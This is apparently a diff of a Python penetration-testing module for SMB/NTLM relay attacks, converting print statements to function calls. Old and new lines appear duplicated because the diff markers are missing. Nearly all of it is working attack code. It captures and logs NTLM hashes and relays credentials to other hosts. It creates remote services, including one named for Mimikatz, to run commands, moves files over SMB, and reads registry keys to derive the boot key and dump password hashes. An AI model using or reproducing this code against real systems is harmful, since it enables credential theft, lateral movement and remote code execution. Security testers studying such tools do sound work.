NthashLen = struct.unpack('<H',data[SSPIStart+20:SSPIStart+22])[0]
NthashOffset = struct.unpack('<H',data[SSPIStart+24:SSPIStart+26])[0]
LMhashLen = struct.unpack('<H',data[SSPIStart+14:SSPIStart+16])[0]
LMhashOffset = struct.unpack('<H',data[SSPIStart+16:SSPIStart+18])[0]
LMHash = SSPIString[LMhashOffset:LMhashOffset+LMhashLen].encode("hex").upper()
NthashLen = struct.unpack('<H',data[SSPIStart+20:SSPIStart+22])[0]
NthashOffset = struct.unpack('<H',data[SSPIStart+24:SSPIStart+26])[0]
if NthashLen == 24:
SMBHash = SSPIString[NthashOffset:NthashOffset+NthashLen].encode("hex").upper()
DomainLen = struct.unpack('<H',SSPIString[30:32])[0]
DomainOffset = struct.unpack('<H',SSPIString[32:34])[0]
Domain = SSPIString[DomainOffset:DomainOffset+DomainLen].decode('UTF-16LE')
UserLen = struct.unpack('<H',SSPIString[38:40])[0]
UserOffset = struct.unpack('<H',SSPIString[40:42])[0]
Username = SSPIString[UserOffset:UserOffset+UserLen].decode('UTF-16LE')
WriteHash = '%s::%s:%s:%s:%s' % (Username, Domain, LMHash, SMBHash, challenge.encode("hex"))
WriteData(Logs_Path+"logs/SMB-Relay-SMB-"+client+".txt", WriteHash, Username)
if NthashLen == 24:
SMBHash = SSPIString[NthashOffset:NthashOffset+NthashLen].encode("hex").upper()
DomainLen = struct.unpack('<H',SSPIString[30:32])[0]
DomainOffset = struct.unpack('<H',SSPIString[32:34])[0]
Domain = SSPIString[DomainOffset:DomainOffset+DomainLen].decode('UTF-16LE')
UserLen = struct.unpack('<H',SSPIString[38:40])[0]
UserOffset = struct.unpack('<H',SSPIString[40:42])[0]
Username = SSPIString[UserOffset:UserOffset+UserLen].decode('UTF-16LE')
WriteHash = '%s::%s:%s:%s:%s' % (Username, Domain, LMHash, SMBHash, challenge.encode("hex"))
WriteData(Logs_Path+"logs/SMB-Relay-SMB-"+client+".txt", WriteHash, Username)
if client == Host:
if Pivoting[0] == "1":
pass
else:
print "[+] Attempting reflective NTLM Relay, this is likely to fail."
print ("[+] Attempting reflective NTLM Relay, this is likely to fail.")
else:
if Pivoting[0] == "1":
pass
else:
print "[+] Received NTLMv1 hash from: %s %s"%(client, ShowSmallResults((client,445)))
print ("[+] Received NTLMv1 hash from: %s %s"%(client, ShowSmallResults((client,445))))
if Username in UserToRelay or "ALL" in UserToRelay:
if Pivoting[0] == "1":
return Username, Domain
print "[+] Username: %s is whitelisted, forwarding credentials."%(Username)
print ("[+] Username: %s is whitelisted, forwarding credentials."%(Username))
if ReadData("SMBRelay-Session.txt", client, Username, Domain, Host, cmd=None):
##Domain\User has already auth on this target, but it failed. Ditch the connection to prevent account lockouts.
return None, None
else:
return Username, Domain
return Username, Domain
else:
print "[+] Username: %s not in target list, dropping connection."%(Username)
return None, None
print ("[+] Username: %s not in target list, dropping connection."%(Username))
return None, None
if NthashLen > 60:
SMBHash = SSPIString[NthashOffset:NthashOffset+NthashLen].encode("hex").upper()
DomainLen = struct.unpack('<H',SSPIString[30:32])[0]
DomainOffset = struct.unpack('<H',SSPIString[32:34])[0]
Domain = SSPIString[DomainOffset:DomainOffset+DomainLen].decode('UTF-16LE')
UserLen = struct.unpack('<H',SSPIString[38:40])[0]
UserOffset = struct.unpack('<H',SSPIString[40:42])[0]
Username = SSPIString[UserOffset:UserOffset+UserLen].decode('UTF-16LE')
WriteHash = '%s::%s:%s:%s:%s' % (Username, Domain, challenge.encode("hex"), SMBHash[:32], SMBHash[32:])
WriteData(Logs_Path+"logs/SMB-Relay-SMB-"+client+".txt", WriteHash, Username)
if NthashLen > 60:
SMBHash = SSPIString[NthashOffset:NthashOffset+NthashLen].encode("hex").upper()
DomainLen = struct.unpack('<H',SSPIString[30:32])[0]
DomainOffset = struct.unpack('<H',SSPIString[32:34])[0]
Domain = SSPIString[DomainOffset:DomainOffset+DomainLen].decode('UTF-16LE')
UserLen = struct.unpack('<H',SSPIString[38:40])[0]
UserOffset = struct.unpack('<H',SSPIString[40:42])[0]
Username = SSPIString[UserOffset:UserOffset+UserLen].decode('UTF-16LE')
WriteHash = '%s::%s:%s:%s:%s' % (Username, Domain, challenge.encode("hex"), SMBHash[:32], SMBHash[32:])
WriteData(Logs_Path+"logs/SMB-Relay-SMB-"+client+".txt", WriteHash, Username)
if client == Host:
if Pivoting[0] == "1":
pass
else:
print "[+] Attempting reflective NTLM Relay, this is likely to fail."
print ("[+] Attempting reflective NTLM Relay, this is likely to fail.")
else:
if Pivoting[0] == "1":
pass
else:
print "[+] Received NTLMv2 hash from: %s %s"%(client, ShowSmallResults((client,445)))
print ("[+] Received NTLMv2 hash from: %s %s"%(client, ShowSmallResults((client,445))))
if Username in UserToRelay or "ALL" in UserToRelay:
if Pivoting[0] == "1":
return Username, Domain
print "[+] Username: %s is whitelisted, forwarding credentials."%(Username)
print ("[+] Username: %s is whitelisted, forwarding credentials."%(Username))
if ReadData("SMBRelay-Session.txt", client, Username, Domain, Host, cmd=None):
##Domain\User has already auth on this target, but it failed. Ditch the connection to prevent account lockouts.
return None, None
else:
return Username, Domain
return Username, Domain
else:
print "[+] Username: %s not in target list, dropping connection."%(Username)
return None, None
print ("[+] Username: %s not in target list, dropping connection."%(Username))
return None, None
#Get the index of the dialect we want. That is NT LM 0.12.
def Parse_Nego_Dialect(data):
Dialect = tuple([e.replace('\x00','') for e in data[40:].split('\x02')[:10]])
for i in range(0, 16):
if Dialect[i] == 'NT LM 0.12':
return chr(i) + '\x00'
Dialect = tuple([e.replace('\x00','') for e in data[40:].split('\x02')[:10]])
for i in range(0, 16):
if Dialect[i] == 'NT LM 0.12':
return chr(i) + '\x00'
def ExtractSMBChallenge(data, Pivoting):
SSPIStart = data.find('NTLMSSP')
@ -271,7 +271,7 @@ def ExtractSMBChallenge(data, Pivoting):
if Pivoting[0] == "1":
return Challenge
else:
print "[+] Setting up SMB relay with SMB challenge:", Challenge.encode("hex")
print ("[+] Setting up SMB relay with SMB challenge:", Challenge.encode("hex"))
return Challenge
def ExtractHTTPChallenge(data,Pivoting):
@ -283,7 +283,7 @@ def ExtractHTTPChallenge(data,Pivoting):
if Pivoting[0] == "1":
return Challenge
else:
print "[+] Setting up HTTP relay with SMB challenge:", Challenge.encode("hex")
print ("[+] Setting up HTTP relay with SMB challenge:", Challenge.encode("hex"))
return Challenge
#Here we extract the complete NTLM message from an HTTP request and we will later feed it to our SMB target.
@ -296,7 +296,7 @@ def ExtractRawNTLMPacket(data):
#Is this a Guest sessions?
def GetSessionResponseFlags(data):
if data[41:43] == "\x01\x00":
print "[+] Server returned session positive, but as guest. Psexec should fail even if authentication was successful.."
print ("[+] Server returned session positive, but as guest. Psexec should fail even if authentication was successful..")
#Keeps our connection alive.
def SMBKeepAlive(s, data):
@ -344,7 +344,7 @@ def FindLocalIp():
IP = s.getsockname()[0]
s.close()
except:
print "It seems like you're not connected to any network.."
print ("It seems like you're not connected to any network..")
IP = '127.0.0.1'
s.close()
return IP
@ -364,7 +364,7 @@ def ConvertToClassC(Host, Class):
Ip[6:7] = ["0"]
return ''.join(Ip)+Class
else:
print "Illegal class, please use: /24 or /16"
print ("Illegal class, please use: /24 or /16")
return None
def GenerateRandomFileName():
@ -510,7 +510,7 @@ def BindCall(UID, Version, File, data, s):
## Fail Handling.
if data[8:10] == "\xa2\x22":
print "[+] NT_CREATE denied. SMB Signing mandatory or this user has no privileges on this workstation.\n"
print ("[+] NT_CREATE denied. SMB Signing mandatory or this user has no privileges on this workstation.\n")
return ModifySMBRetCode(data)
## Fail Handling.
@ -582,14 +582,14 @@ def MimiKatzRPC(Command, f, host, data, s):
#First Packet from output contains the complete len of what's coming, don't print it.
LenOut = len(ExtractRPCCommandOutput(data))
Output = ExtractRPCCommandOutput(data)[12:LenOut-9]
print Output
print (Output)
return data,s,f
##Do large RPC reads..
if data[8:10] == "\x2e\x05":
buffsize = 1024
filesize = struct.unpack('<i', data[96:100])[0]*2
print 'File size: %s'%(GetReadableSize(filesize))
print ('File size: %s'%(GetReadableSize(filesize)))
dataoffset = 0
start_time = time.time()
##First Packet from output contains the complete len of what's coming, don't print it.
@ -617,10 +617,10 @@ def MimiKatzRPC(Command, f, host, data, s):
Seconds = (time.time() - start_time)
if Seconds>60:
minutes = Seconds/60
print 'Fetched in: %.3g minutes.'%(minutes)
print ('Fetched in: %.3g minutes.'%(minutes))
if Seconds<60:
print 'Fetched in: %.3g seconds'%(Seconds)
print "Output:\n", Output
print ('Fetched in: %.3g seconds'%(Seconds))
print ("Output:\n", Output)
return data,s,f
######################################
@ -643,7 +643,7 @@ def CreateMimikatzService(Command, ServiceNameChars, ServiceIDChars, f, host, da
##Error handling.
if data[8:10] == "\x2e\x00":
if data[len(data)-4:] == "\x05\x00\x00\x00":
print "[+] Failed to open SVCCTL Service Manager, is that user a local admin on this host?\n"
print ("[+] Failed to open SVCCTL Service Manager, is that user a local admin on this host?\n")
return ModifySMBRetCode(data)
## DCE/RPC Create Service.
@ -660,12 +660,12 @@ def CreateMimikatzService(Command, ServiceNameChars, ServiceIDChars, f, host, da
buffer1 = longueur(packet0)+packet0
s.send(buffer1)
data = s.recv(2048)
#print "[+] Creating service"
#print ("[+] Creating service")
## DCE/RPC SVCCTLOpenService.
if data[8:10] == "\x25\x00":
if data[len(data)-4:] == "\x05\x00\x00\x00":
print "[+] Failed to create the service\n"
print ("[+] Failed to create the service\n")
return ModifySMBRetCode(data)
ContextHandlerService = data[88:108]
head = SMBHeader(cmd="\x25",flag1="\x18", flag2="\x07\xc8",mid="\x0a\x00",pid=data[30:32],uid=data[32:34],tid=data[28:30])
@ -683,7 +683,7 @@ def CreateMimikatzService(Command, ServiceNameChars, ServiceIDChars, f, host, da
## DCE/RPC SVCCTLStartService.
if data[8:10] == "\x25\x00":
if data[len(data)-4:] == "\x05\x00\x00\x00":
print "[+] Failed to open the service.\n"
print ("[+] Failed to open the service.\n")
return ModifySMBRetCode(data)
ContextHandler = data[84:104]
head = SMBHeader(cmd="\x25",flag1="\x18", flag2="\x07\xc8",mid="\x0b\x00",pid=data[30:32],uid=data[32:34],tid=data[28:30])
@ -700,7 +700,7 @@ def CreateMimikatzService(Command, ServiceNameChars, ServiceIDChars, f, host, da
## DCE/RPC SVCCTLQueryService.
if data[8:10] == "\x25\x00":
if data[len(data)-4:] == "\x05\x00\x00\x00":
print "[+] Failed to start the service.\n"
print ("[+] Failed to start the service.\n")
return ModifySMBRetCode(data)
head = SMBHeader(cmd="\x25",flag1="\x18", flag2="\x07\xc8",mid="\x0b\x00",pid=data[30:32],uid=data[32:34],tid=data[28:30])
w = SMBDCESVCCTLQueryService(ContextHandle=ContextHandlerService)
@ -720,7 +720,7 @@ def CreateMimikatzService(Command, ServiceNameChars, ServiceIDChars, f, host, da
## DCE/RPC SVCCTLCloseService
if data[8:10] == "\x25\x00":
if data[len(data)-4:] == "\x05\x00\x00\x00":
print "[+] Failed to query the service.\n"
print ("[+] Failed to query the service.\n")
return ModifySMBRetCode(data)
head = SMBHeader(cmd="\x25",flag1="\x18", flag2="\x07\xc8",mid="\x0b\x00",pid=data[30:32],uid=data[32:34],tid=data[28:30])
w = SMBDCESVCCTLCloseService(ContextHandle=ContextHandlerService)
@ -754,13 +754,13 @@ def StopAndDeleteService(Command, ServiceNameChars, ServiceIDChars, f, host, dat
##Error handling.
if data[8:10] == "\x2e\x00":
if data[len(data)-4:] == "\x05\x00\x00\x00":
print "[+] Failed to open SVCCTL Service Manager, is that user a local admin on this host?\n"
print ("[+] Failed to open SVCCTL Service Manager, is that user a local admin on this host?\n")
return ModifySMBRetCode(data)
## DCE/RPC SVCCTLOpenService.
if data[8:10] == "\x25\x00":
if data[len(data)-4:] == "\x05\x00\x00\x00":
print "[+] Failed to create the service\n"
print ("[+] Failed to create the service\n")
return ModifySMBRetCode(data)
ContextHandlerService = data[84:104]
head = SMBHeader(cmd="\x25",flag1="\x18", flag2="\x07\xc8",mid="\x0a\x00",pid=data[30:32],uid=data[32:34],tid=data[28:30])
@ -778,7 +778,7 @@ def StopAndDeleteService(Command, ServiceNameChars, ServiceIDChars, f, host, dat
## DCE/RPC SVCCTLControlService, stop operation.
if data[8:10] == "\x25\x00":
if data[len(data)-4:] == "\x05\x00\x00\x00":
print "[+] Failed to open the service.\n"
print ("[+] Failed to open the service.\n")
return ModifySMBRetCode(data)
ContextHandlerService = data[84:104]
head = SMBHeader(cmd="\x25",flag1="\x18", flag2="\x07\xc8",mid="\x0b\x00",pid=data[30:32],uid=data[32:34],tid=data[28:30])
@ -795,7 +795,7 @@ def StopAndDeleteService(Command, ServiceNameChars, ServiceIDChars, f, host, dat
## DCE/RPC SVCCTLDeleteService.
if data[8:10] == "\x25\x00":
if data[len(data)-4:] == "\x05\x00\x00\x00":
print "[+] Failed to stop the service.\n"
print ("[+] Failed to stop the service.\n")
return ModifySMBRetCode(data)
head = SMBHeader(cmd="\x25",flag1="\x18", flag2="\x07\xc8",mid="\x0b\x00",pid=data[30:32],uid=data[32:34],tid=data[28:30])
w = SMBDCESVCCTLDeleteService(ContextHandle=ContextHandlerService)
@ -811,7 +811,7 @@ def StopAndDeleteService(Command, ServiceNameChars, ServiceIDChars, f, host, dat
## DCE/RPC SVCCTLCloseService
if data[8:10] == "\x25\x00":
if data[len(data)-4:] == "\x05\x00\x00\x00":
print "[+] Failed to delete the service.\n"
print ("[+] Failed to delete the service.\n")
return ModifySMBRetCode(data)
head = SMBHeader(cmd="\x25",flag1="\x18", flag2="\x07\xc8",mid="\x0b\x00",pid=data[30:32],uid=data[32:34],tid=data[28:30])
w = SMBDCESVCCTLCloseService(ContextHandle=ContextHandlerService)
@ -846,7 +846,7 @@ def CreateService(Command, ServiceNameChars, ServiceIDChars, f, host, data, s):
##Error handling.
if data[8:10] == "\x2e\x00":
if data[len(data)-4:] == "\x05\x00\x00\x00":
print "[+] Failed to open SVCCTL Service Manager, is that user a local admin on this host?\n"
print ("[+] Failed to open SVCCTL Service Manager, is that user a local admin on this host?\n")
return ModifySMBRetCode(data)
## DCE/RPC Create Service.
@ -863,12 +863,12 @@ def CreateService(Command, ServiceNameChars, ServiceIDChars, f, host, data, s):
buffer1 = longueur(packet0)+packet0
s.send(buffer1)
data = s.recv(2048)
#print "[+] Creating service"
#print ("[+] Creating service")
## DCE/RPC SVCCTLOpenService.
if data[8:10] == "\x25\x00":
if data[len(data)-4:] == "\x05\x00\x00\x00":
print "[+] Failed to create the service\n"
print ("[+] Failed to create the service\n")
return ModifySMBRetCode(data)
ContextHandlerService = data[88:108]
head = SMBHeader(cmd="\x25",flag1="\x18", flag2="\x07\xc8",mid="\x0a\x00",pid=data[30:32],uid=data[32:34],tid=data[28:30])
@ -886,7 +886,7 @@ def CreateService(Command, ServiceNameChars, ServiceIDChars, f, host, data, s):
## DCE/RPC SVCCTLStartService.
if data[8:10] == "\x25\x00":
if data[len(data)-4:] == "\x05\x00\x00\x00":
print "[+] Failed to open the service.\n"
print ("[+] Failed to open the service.\n")
return ModifySMBRetCode(data)
ContextHandler = data[84:104]
head = SMBHeader(cmd="\x25",flag1="\x18", flag2="\x07\xc8",mid="\x0b\x00",pid=data[30:32],uid=data[32:34],tid=data[28:30])
@ -903,7 +903,7 @@ def CreateService(Command, ServiceNameChars, ServiceIDChars, f, host, data, s):
## DCE/RPC SVCCTLQueryService.
if data[8:10] == "\x25\x00":
if data[len(data)-4:] == "\x05\x00\x00\x00":
print "[+] Failed to start the service.\n"
print ("[+] Failed to start the service.\n")
return ModifySMBRetCode(data)
head = SMBHeader(cmd="\x25",flag1="\x18", flag2="\x07\xc8",mid="\x0b\x00",pid=data[30:32],uid=data[32:34],tid=data[28:30])
w = SMBDCESVCCTLQueryService(ContextHandle=ContextHandlerService)
@ -923,7 +923,7 @@ def CreateService(Command, ServiceNameChars, ServiceIDChars, f, host, data, s):
## DCE/RPC SVCCTLControlService, stop operation.
if data[8:10] == "\x25\x00":
if data[len(data)-4:] == "\x05\x00\x00\x00":
print "[+] Failed to query the service.\n"
print ("[+] Failed to query the service.\n")
return ModifySMBRetCode(data)
head = SMBHeader(cmd="\x25",flag1="\x18", flag2="\x07\xc8",mid="\x0b\x00",pid=data[30:32],uid=data[32:34],tid=data[28:30])
w = SMBDCESVCCTLControlService(ContextHandle=ContextHandlerService,ControlOperation = "\x01\x00\x00\x00")
@ -939,7 +939,7 @@ def CreateService(Command, ServiceNameChars, ServiceIDChars, f, host, data, s):
## DCE/RPC SVCCTLDeleteService.
if data[8:10] == "\x25\x00":
if data[len(data)-4:] == "\x05\x00\x00\x00":
print "[+] Failed to start the service.\n"
print ("[+] Failed to start the service.\n")
return ModifySMBRetCode(data)
head = SMBHeader(cmd="\x25",flag1="\x18", flag2="\x07\xc8",mid="\x0b\x00",pid=data[30:32],uid=data[32:34],tid=data[28:30])
w = SMBDCESVCCTLDeleteService(ContextHandle=ContextHandlerService)
@ -955,7 +955,7 @@ def CreateService(Command, ServiceNameChars, ServiceIDChars, f, host, data, s):
## DCE/RPC SVCCTLCloseService
if data[8:10] == "\x25\x00":
if data[len(data)-4:] == "\x05\x00\x00\x00":
print "[+] Failed to delete the service.\n"
print ("[+] Failed to delete the service.\n")
return ModifySMBRetCode(data)
head = SMBHeader(cmd="\x25",flag1="\x18", flag2="\x07\xc8",mid="\x0b\x00",pid=data[30:32],uid=data[32:34],tid=data[28:30])
w = SMBDCESVCCTLCloseService(ContextHandle=ContextHandlerService)
@ -990,15 +990,15 @@ def StartWinregService(f, host, data, s):
##Error handling.
if data[8:10] == "\x2e\x00":
if data[len(data)-4:] == "\x05\x00\x00\x00":
print "[+] Failed to open SVCCTL Service Manager, is that user a local admin on this host?\n"
print ("[+] Failed to open SVCCTL Service Manager, is that user a local admin on this host?\n")
return ModifySMBRetCode(data)
## DCE/RPC SVCCTLOpenService.
if data[8:10] == "\x25\x00":
if data[len(data)-4:] == "\x05\x00\x00\x00":
print "[+] Failed to create the service\n"
print ("[+] Failed to create the service\n")
return ModifySMBRetCode(data)
#print "[+] Service name: %s with display name: %s successfully created"%(ServiceNameChars, ServiceIDChars)
#print ("[+] Service name: %s with display name: %s successfully created"%(ServiceNameChars, ServiceIDChars))
#ContextHandlerService = data[88:108]
ContextHandler = data[84:104]
head = SMBHeader(cmd="\x25",flag1="\x18", flag2="\x07\xc8",mid="\x0a\x00",pid=data[30:32],uid=data[32:34],tid=data[28:30])
@ -1016,7 +1016,7 @@ def StartWinregService(f, host, data, s):
## DCE/RPC SVCCTLStartService.
if data[8:10] == "\x25\x00":
if data[len(data)-4:] == "\x05\x00\x00\x00":
print "[+] Failed to open the service.\n"
print ("[+] Failed to open the service.\n")
return ModifySMBRetCode(data)
ContextHandlerService = data[84:104]
head = SMBHeader(cmd="\x25",flag1="\x18", flag2="\x07\xc8",mid="\x0b\x00",pid=data[30:32],uid=data[32:34],tid=data[28:30])
@ -1033,7 +1033,7 @@ def StartWinregService(f, host, data, s):
## DCE/RPC SVCCTLQueryService.
if data[8:10] == "\x25\x00":
if data[len(data)-4:] == "\x05\x00\x00\x00":
print "[+] Failed to start the service.\n"
print ("[+] Failed to start the service.\n")
return ModifySMBRetCode(data)
head = SMBHeader(cmd="\x25",flag1="\x18", flag2="\x07\xc8",mid="\x0b\x00",pid=data[30:32],uid=data[32:34],tid=data[28:30])
w = SMBDCESVCCTLQueryService(ContextHandle=ContextHandlerService)
@ -1049,7 +1049,7 @@ def StartWinregService(f, host, data, s):
## DCE/RPC SVCCTLCloseService
if data[8:10] == "\x25\x00":
if data[len(data)-4:] == "\x05\x00\x00\x00":
print "[+] Failed to query the service.\n"
print ("[+] Failed to query the service.\n")
return ModifySMBRetCode(data)
head = SMBHeader(cmd="\x25",flag1="\x18", flag2="\x07\xc8",mid="\x0b\x00",pid=data[30:32],uid=data[32:34],tid=data[28:30])
w = SMBDCESVCCTLCloseService(ContextHandle=ContextHandlerService)
@ -1083,15 +1083,15 @@ def StopWinregService(f, host, data, s):
##Error handling.
if data[8:10] == "\x2e\x00":
if data[len(data)-4:] == "\x05\x00\x00\x00":
print "[+] Failed to open SVCCTL Service Manager, is that user a local admin on this host?\n"
print ("[+] Failed to open SVCCTL Service Manager, is that user a local admin on this host?\n")
return ModifySMBRetCode(data)
## DCE/RPC SVCCTLOpenService.
if data[8:10] == "\x25\x00":
if data[len(data)-4:] == "\x05\x00\x00\x00":
print "[+] Failed to create the service\n"
print ("[+] Failed to create the service\n")
return ModifySMBRetCode(data)
#print "[+] Service name: %s with display name: %s successfully created"%(ServiceNameChars, ServiceIDChars)
#print ("[+] Service name: %s with display name: %s successfully created"%(ServiceNameChars, ServiceIDChars))
#ContextHandlerService = data[88:108]
ContextHandler = data[84:104]
head = SMBHeader(cmd="\x25",flag1="\x18", flag2="\x07\xc8",mid="\x0a\x00",pid=data[30:32],uid=data[32:34],tid=data[28:30])
@ -1109,7 +1109,7 @@ def StopWinregService(f, host, data, s):
## DCE/RPC SVCCTLStartService.
if data[8:10] == "\x25\x00":
if data[len(data)-4:] == "\x05\x00\x00\x00":
print "[+] Failed to open the service.\n"
print ("[+] Failed to open the service.\n")
return ModifySMBRetCode(data)
ContextHandlerService = data[84:104]
head = SMBHeader(cmd="\x25",flag1="\x18", flag2="\x07\xc8",mid="\x0b\x00",pid=data[30:32],uid=data[32:34],tid=data[28:30])
@ -1126,7 +1126,7 @@ def StopWinregService(f, host, data, s):
## DCE/RPC SVCCTLQueryService.
if data[8:10] == "\x25\x00":
if data[len(data)-4:] == "\x05\x00\x00\x00":
print "[+] Failed to stop the service.\n"
print ("[+] Failed to stop the service.\n")
return ModifySMBRetCode(data)
head = SMBHeader(cmd="\x25",flag1="\x18", flag2="\x07\xc8",mid="\x0b\x00",pid=data[30:32],uid=data[32:34],tid=data[28:30])
w = SMBDCESVCCTLQueryService(ContextHandle=ContextHandlerService)
@ -1142,7 +1142,7 @@ def StopWinregService(f, host, data, s):
## DCE/RPC SVCCTLCloseService
if data[8:10] == "\x25\x00":
if data[len(data)-4:] == "\x05\x00\x00\x00":
print "[+] Failed to query the service.\n"
print ("[+] Failed to query the service.\n")
return ModifySMBRetCode(data)
head = SMBHeader(cmd="\x25",flag1="\x18", flag2="\x07\xc8",mid="\x0b\x00",pid=data[30:32],uid=data[32:34],tid=data[28:30])
w = SMBDCESVCCTLCloseService(ContextHandle=ContextHandlerService)
@ -1208,7 +1208,7 @@ def SMBOpenFile(Filename, Share, Host, Access, data, s):
data = s.recv(2048)
if data[8:10] == "\x2d\x22":
print "[+] Can't open the file, access is denied (write protected file?)."
print ("[+] Can't open the file, access is denied (write protected file?).")
f = "A" #Don't throw an exception at the calling function because there's not enough value to unpack.
#We'll recover that connection..
return data, s, f
@ -1239,7 +1239,7 @@ def SMBOpenFile(Filename, Share, Host, Access, data, s):
##OpenAndX.
if data[8:10] == "\x2d\x34":
print "[+] The command failed or took to long to complete."
print ("[+] The command failed or took to long to complete.")
return data, s
##all good.
@ -1272,13 +1272,13 @@ def SMBOpenFileForWriting(Filename, FileSize, FileContent, Share, Host, Access,
data = s.recv(2048)
if data[8:10] == "\xa2\x22":
print "[+] Can't open the file, access is denied (write protected file?)."
print ("[+] Can't open the file, access is denied (write protected file?).")
f = "A" #Don't throw an exception at the calling function because there's not enough value to unpack.
#We'll recover that connection..
return data, s, f
if data[8:10] == "\xa2\x35":
print "[+] Name collision, this file already exist in windows/temp/. Try: delete /windows/Temp/"+Filename
print ("[+] Name collision, this file already exist in windows/temp/. Try: delete /windows/Temp/"+Filename)
f = "A" #Don't throw an exception at the calling function because there's not enough value to unpack.
#We'll recover that connection..
return data, s, f
@ -1289,7 +1289,7 @@ def SMBOpenFileForWriting(Filename, FileSize, FileContent, Share, Host, Access,
##OpenAndX.
if data[8:10] == "\xa2\x34":
print "[+] The command failed or took to long to complete."
print ("[+] The command failed or took to long to complete.")
return data, s
##all good.
@ -1345,7 +1345,7 @@ def GrabAndRead(f, Filename, data, s):
##Do large reads..
if data[8:10] == "\x2e\x00" and struct.unpack("<H", data[61:63])[0] == 65520:
print 'File size: %s'%(GetReadableSize(filesize))
print ('File size: %s'%(GetReadableSize(filesize)))
#Do progress bar for large download, so the pentester doesn't fall asleep while doing a large SMB read operation..
#if we're here it's because filesize > 65520.
first = filesize-65520
@ -1371,9 +1371,9 @@ def GrabAndRead(f, Filename, data, s):
Seconds = (time.time() - start_time) - READTIMEOUT
if Seconds>60:
minutes = Seconds/60
print 'Downloaded in: %.3g minutes.'%(minutes)
print ('Downloaded in: %.3g minutes.'%(minutes))
if Seconds<60:
print 'Downloaded in: %.3g seconds'%(Seconds)
print ('Downloaded in: %.3g seconds'%(Seconds))
##Close Request
if data[8:10] == "\x2e\x00":
@ -1407,7 +1407,7 @@ def UploadAndWrite(f, FileSize, FileContent, data, s):
count = 0
bar = 80
start_time = time.time()
print 'File size: %s'%(GetReadableSize(FileSize))
print ('File size: %s'%(GetReadableSize(FileSize)))
for i in xrange(count_number):
count = count+1
Chunk = FileContent[dataoffset:dataoffset+30000]
@ -1427,9 +1427,9 @@ def UploadAndWrite(f, FileSize, FileContent, data, s):
Seconds = (time.time() - start_time) - READTIMEOUT
if Seconds>60:
minutes = Seconds/60
print 'Uploaded in: %.3g minutes.'%(minutes)
print ('Uploaded in: %.3g minutes.'%(minutes))
if Seconds<60:
print 'Uploaded in: %.3g seconds'%(Seconds)
print ('Uploaded in: %.3g seconds'%(Seconds))
##Close Request
if data[8:10] == "\x2f\x00":
@ -1460,7 +1460,7 @@ def ReadAndDelete(f, Filename, data, s):
##Do large reads..
if data[8:10] == "\x2e\x00" and struct.unpack("<H", data[61:63])[0] == 65520:
print 'File size: %s'%(GetReadableSize(filesize))
print ('File size: %s'%(GetReadableSize(filesize)))
#Do progress bar for large download, so the pentester doesn't fall asleep while doing a large SMB read operation..
#if we're here it's because filesize > 65520.
first = filesize-65520
@ -1486,9 +1486,9 @@ def ReadAndDelete(f, Filename, data, s):
Seconds = (time.time() - start_time) - READTIMEOUT
if Seconds>60:
minutes = Seconds/60
print 'Downloaded in: %.3g minutes.\n'%(minutes)
print ('Downloaded in: %.3g minutes.\n'%(minutes))
if Seconds<60:
print 'Downloaded in: %.3g seconds'%(Seconds)
print ('Downloaded in: %.3g seconds'%(Seconds))
##Close Request
if data[8:10] == "\x2e\x00":
@ -1550,12 +1550,12 @@ def DeleteAFile(Filename, data, s, Host):
data = s.recv(2048)
if data[8:10] == "\x06\x21":
print "[+] Delete Failed. Server ("+Host+") returned STATUS_CANNOT_DELETE, "+Filename+" is currently in use by another process."
print "[+] Try taskkill /F /IM process_name, then delete the file."
print ("[+] Delete Failed. Server ("+Host+") returned STATUS_CANNOT_DELETE, "+Filename+" is currently in use by another process.")
print ("[+] Try taskkill /F /IM process_name, then delete the file.")
return data, s
if data[8:10] == "\x06\x34":
print "[+] Delete Failed. File not found."
print ("[+] Delete Failed. File not found.")
return data, s
if data[8:10] == "\x06\x00":
@ -1587,7 +1587,7 @@ def GrabKeyValue(s, f, handler, data, keypath):
## DCE/RPC Query Info.
if data[8:10] == "\x25\x00":
if data[len(data)-4:] == "\x05\x00\x00\x00":
print "[+] Failed to read the key\n"
print ("[+] Failed to read the key\n")
return ModifySMBRetCode(data)
ContextHandler = data[84:104]
head = SMBHeader(cmd="\x25",flag1="\x18", flag2="\x07\xc8",mid="\x0a\x00",pid=data[30:32],uid=data[32:34],tid=data[28:30])
@ -1605,7 +1605,7 @@ def GrabKeyValue(s, f, handler, data, keypath):
## DCE/RPC CloseKey.
if data[8:10] == "\x25\x00":
if data[len(data)-4:] == "\x05\x00\x00\x00":
print "[+] Failed to close the key\n"
print ("[+] Failed to close the key\n")
return ModifySMBRetCode(data)
head = SMBHeader(cmd="\x25",flag1="\x18", flag2="\x07\xc8",mid="\x0a\x00",pid=data[30:32],uid=data[32:34],tid=data[28:30])
w = SMBDCEWinRegCloseKey(ContextHandle=ContextHandler)
@ -1689,7 +1689,7 @@ def ConvertValuesToBootKey(JDSkew1GBGData):
Xored = [0x8, 0x5, 0x4, 0x2, 0xb, 0x9, 0xd, 0x3, 0x0, 0x6, 0x1, 0xc, 0xe, 0xa, 0xf, 0x7]
for i in range(len(JDSkew1GBGData)):
Key += JDSkew1GBGData[Xored[i]]
print 'BootKey: %s' % Key.encode("hex")
print ('BootKey: %s' % Key.encode("hex"))
return Key
##########Dump Hashes#############
@ -1700,12 +1700,12 @@ def DumpHashes(data, s, Host):
data,s,f = BindCall("\x01\xd0\x8c\x33\x44\x22\xf1\x31\xaa\xaa\x90\x00\x38\x00\x10\x03", "\x01\x00", "\\winreg", data, s)
if f == "PipeNotAvailable":
print "The Windows Remote Registry Service is sleeping, waking it up..."
print ("The Windows Remote Registry Service is sleeping, waking it up...")
time.sleep(3)
data,s,f = BindCall("\x01\xd0\x8c\x33\x44\x22\xf1\x31\xaa\xaa\x90\x00\x38\x00\x10\x03", "\x01\x00", "\\winreg", data, s)
if f == "PipeNotAvailable":
print "Retrying..."
print ("Retrying...")
time.sleep(5)
data,s,f = BindCall("\x01\xd0\x8c\x33\x44\x22\xf1\x31\xaa\xaa\x90\x00\x38\x00\x10\x03", "\x01\x00", "\\winreg", data, s)
@ -1722,7 +1722,7 @@ def DumpHashes(data, s, Host):
##Error handling.
if data[8:10] == "\x25\x00":
if data[len(data)-4:] == "\x05\x00\x00\x00":
print "[+] Failed to open Winreg HKLM, is that user a local admin on this host?\n"
print ("[+] Failed to open Winreg HKLM, is that user a local admin on this host?\n")
return ModifySMBRetCode(data)
##Grab the keys
if data[8:10] == "\x25\x00":
@ -1753,14 +1753,14 @@ def DumpHashes(data, s, Host):
